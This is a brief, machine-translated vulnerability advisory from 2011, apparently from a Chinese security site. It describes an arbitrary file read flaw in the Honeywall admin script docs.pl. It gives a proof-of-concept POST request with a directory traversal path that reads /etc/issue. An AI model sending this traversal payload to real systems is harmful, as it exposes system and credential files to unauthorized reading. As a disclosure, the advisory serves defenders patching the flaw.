Honeywall admin interface arbitrary file read vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201130590
Type myhack58
Reporter 佚名
Modified 2011-05-24T00:00:00


Publishing author: cnyouker

Vulnerability type: arbitrary file traversal/download Vulnerability description: Honeywall admin interface arbitrary file read vulnerability

Detailed description: admin/docs.pl for the POST of the file check is not strict. Can construct their own post package to read arbitrary files.

Vulnerability to prove: http://xxx.xxx.xxx/admin/docs.pl POST-content: act=1 6&file=../../../../../../../../etc/issue&submit=Submit

! [Click to view original image](/Article/UploadPic/2011-5/201152414041802.jpg)